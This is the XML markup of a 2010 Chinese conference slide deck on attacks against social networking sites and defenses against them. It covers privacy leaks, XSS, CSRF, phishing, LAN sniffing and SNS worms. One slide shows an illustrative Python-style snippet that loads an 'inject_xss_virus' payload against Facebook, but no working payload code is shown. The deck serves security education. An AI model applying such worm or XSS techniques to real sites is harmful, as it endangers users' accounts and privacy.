            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>SNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>就</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>是基于用户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日志辅助定位问题所在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8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空心弧 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="5107670" y="2521924"/>
            <a:ext cx="3482264" cy="3482264"/>
          </a:xfrm>
          <a:prstGeom prst="blockArc">
            <a:avLst>
              <a:gd name="adj1" fmla="val 16200000"/>
              <a:gd name="adj2" fmla="val 0"/>
              <a:gd name="adj3" fmla="val 4636"/>
            </a:avLst>
          </a:pr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愈演愈烈的战争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SNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>攻击会是一种趋势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很多有价值的数据</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>为什么要攻击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always just kidding</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>利</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>益驱动</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>都有谁参与了防御</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="空心弧 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5106035" y="2522876"/>
            <a:ext cx="3482264" cy="3482264"/>
          </a:xfrm>
          <a:prstGeom prst="blockArc">
            <a:avLst>
              <a:gd name="adj1" fmla="val 10800000"/>
              <a:gd name="adj2" fmla="val 16200000"/>
              <a:gd name="adj3" fmla="val 4636"/>
            </a:avLst>
          </a:pr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空心弧 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5106035" y="2522876"/>
            <a:ext cx="3482264" cy="3482264"/>
          </a:xfrm>
          <a:prstGeom prst="blockArc">
            <a:avLst>
              <a:gd name="adj1" fmla="val 0"/>
              <a:gd name="adj2" fmla="val 5400000"/>
              <a:gd name="adj3" fmla="val 4636"/>
            </a:avLst>
          </a:pr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空心弧 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5106035" y="2522876"/>
            <a:ext cx="3482264" cy="3482264"/>
          </a:xfrm>
          <a:prstGeom prst="blockArc">
            <a:avLst>
              <a:gd name="adj1" fmla="val 16200000"/>
              <a:gd name="adj2" fmla="val 0"/>
              <a:gd name="adj3" fmla="val 4636"/>
            </a:avLst>
          </a:pr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组合 7"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6046360" y="3463200"/>
            <a:ext cx="1601615" cy="1601615"/>
            <a:chOff x="1827484" y="1462173"/>
            <a:chExt cx="1601615" cy="1601615"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="21" name="椭圆 20"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1827484" y="1462173"/>
              <a:ext cx="1601615" cy="160161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椭圆 7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2062035" y="1696724"/>
              <a:ext cx="1132513" cy="11325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100" kern="1200" dirty="0" smtClean="0"/>
                <a:t>wars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86602" y="2002671"/>
            <a:ext cx="1121130" cy="1121130"/>
            <a:chOff x="2067726" y="1644"/>
            <a:chExt cx="1121130" cy="1121130"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19" name="椭圆 18"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2067726" y="1644"/>
              <a:ext cx="1121130" cy="11211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9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2231912" y="165830"/>
              <a:ext cx="792758" cy="79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browsers</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="16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87374" y="3703443"/>
            <a:ext cx="1121130" cy="1121130"/>
            <a:chOff x="3768498" y="1702416"/>
            <a:chExt cx="1121130" cy="1121130"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="椭圆 16"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3768498" y="1702416"/>
              <a:ext cx="1121130" cy="11211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11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3932684" y="1866602"/>
              <a:ext cx="792758" cy="79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web users</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="20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86602" y="5404214"/>
            <a:ext cx="1121130" cy="1121130"/>
            <a:chOff x="2067726" y="3403187"/>
            <a:chExt cx="1121130" cy="1121130"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="椭圆 14"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2067726" y="3403187"/>
              <a:ext cx="1121130" cy="11211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13"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2231912" y="3567373"/>
              <a:ext cx="792758" cy="79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 smtClean="0"/>
                <a:t>laws</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="28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85831" y="3703443"/>
            <a:ext cx="1121130" cy="1121130"/>
            <a:chOff x="366955" y="1702416"/>
            <a:chExt cx="1121130" cy="1121130"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="椭圆 12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="366955" y="1702416"/>
              <a:ext cx="1121130" cy="11211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椭圆 15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="531141" y="1866602"/>
              <a:ext cx="792758" cy="79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/>
                <a:t>web app providers</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" alt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65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更安全的互联网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我们也尽了一份力</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>:D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6" y="2697063"/>
            <a:ext cx="862965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54188"/>
            <a:ext cx="4667250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7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人人网的张建伟</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>百</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>度有啊的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>monyer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80vul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hi_heige</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>感</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>谢</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>Knownsec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的伙伴们</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>感</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>谢</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>xeye</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> team</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的伙伴们</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>欢迎与我交流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2655" y="260648"/>
            <a:ext cx="482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CBF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;&gt;&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7CBF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>x = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7CBF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>attacklib.xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7CBF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>('http://www.facebook.com')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7CBF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;&gt;&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7CBF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>x.login</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7CBF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>('lurenjia@gmail.com', '*******')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7CBF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;&gt;&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7CBF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>x.load</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7CBF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(payloads['</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7CBF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>inject_xss_virus_f</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7CBF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'])</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7CBF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;&gt;&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7CBF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>x.run</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7CBF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="7CB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2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这些</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>SNS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39" y="2132856"/>
            <a:ext cx="1847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00400"/>
            <a:ext cx="14763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01911"/>
            <a:ext cx="20955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51" y="4198788"/>
            <a:ext cx="10096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98" y="3019424"/>
            <a:ext cx="1304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76" y="4380680"/>
            <a:ext cx="87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76" y="4791992"/>
            <a:ext cx="1495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81" y="3925588"/>
            <a:ext cx="16097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12" y="5401592"/>
            <a:ext cx="2743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37" y="5646531"/>
            <a:ext cx="781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14" y="5086671"/>
            <a:ext cx="13049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6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web2.0 - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>mashup</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>用户参与</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean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生、白领、草根、其他特定人群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强调实</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>名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完备的隐私控制策略</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>社</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>会关系虚拟化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攻防出发点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信任关系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层面</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>同源策</a:t>
            </a:r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嵌入的第</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>三</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>方内容安全性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户层面</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>户判断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隐私数据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身</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>份认证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password, cookies, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>认证</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>token</a:t>
            </a:r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私消息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8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二、攻防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 descr="http://hiphotos.baidu.com/high_school_musical/pic/item/682febee13fd63222cf5340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80512" cy="68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、隐私泄露多种途径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Incomplete Privacy Control</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Cross Site Scripting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Cross Site Request </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Forgery</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Web Game</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>外</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>挂</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>Lan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> sniffing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Phishing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Mobile web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85528"/>
            <a:ext cx="30670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2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831</TotalTime>
  <Words>1925</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>全屏显示(4:3)</PresentationFormat>
  <Paragraphs>337</Paragraphs>
  <Slides>43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模块</vt:lpstr>
      <vt:lpstr>邪恶的SNS攻击与防御</vt:lpstr>
      <vt:lpstr>who am I</vt:lpstr>
      <vt:lpstr>演讲内容</vt:lpstr>
      <vt:lpstr>一、理解SNS</vt:lpstr>
      <vt:lpstr>这些SNS</vt:lpstr>
      <vt:lpstr>特点</vt:lpstr>
      <vt:lpstr>攻防出发点</vt:lpstr>
      <vt:lpstr>二、攻防</vt:lpstr>
      <vt:lpstr>1、隐私泄露多种途径</vt:lpstr>
      <vt:lpstr>Incomplete Privacy Control</vt:lpstr>
      <vt:lpstr>Incomplete Privacy Control</vt:lpstr>
      <vt:lpstr>攻击</vt:lpstr>
      <vt:lpstr>防御</vt:lpstr>
      <vt:lpstr>Cross Site Scripting</vt:lpstr>
      <vt:lpstr>攻击</vt:lpstr>
      <vt:lpstr>攻击</vt:lpstr>
      <vt:lpstr>防御</vt:lpstr>
      <vt:lpstr>防御</vt:lpstr>
      <vt:lpstr>Cross Site Request Forgery</vt:lpstr>
      <vt:lpstr>攻击</vt:lpstr>
      <vt:lpstr>攻击</vt:lpstr>
      <vt:lpstr>防御</vt:lpstr>
      <vt:lpstr>Web Game外挂</vt:lpstr>
      <vt:lpstr>攻击</vt:lpstr>
      <vt:lpstr>防御</vt:lpstr>
      <vt:lpstr>Lan sniffing</vt:lpstr>
      <vt:lpstr>攻击</vt:lpstr>
      <vt:lpstr>防御</vt:lpstr>
      <vt:lpstr>Phishing</vt:lpstr>
      <vt:lpstr>攻击</vt:lpstr>
      <vt:lpstr>防御</vt:lpstr>
      <vt:lpstr>Mobile web</vt:lpstr>
      <vt:lpstr>攻击</vt:lpstr>
      <vt:lpstr>防御</vt:lpstr>
      <vt:lpstr>2、SNS Virus/Worm</vt:lpstr>
      <vt:lpstr>性质</vt:lpstr>
      <vt:lpstr>潜伏模式</vt:lpstr>
      <vt:lpstr>自我繁殖模式</vt:lpstr>
      <vt:lpstr>攻击</vt:lpstr>
      <vt:lpstr>防御</vt:lpstr>
      <vt:lpstr>三、愈演愈烈的战争</vt:lpstr>
      <vt:lpstr>更安全的互联网</vt:lpstr>
      <vt:lpstr>四、Q&amp;A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邪恶的SNS攻击与防御</dc:title>
  <dc:creator>cosine</dc:creator>
  <cp:lastModifiedBy>cosine</cp:lastModifiedBy>
  <cp:revision>359</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2010-07-11T14:33:08Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2010-07-13T16:53:27Z</dcterms:modified>
</cp:coreProperties>
</file>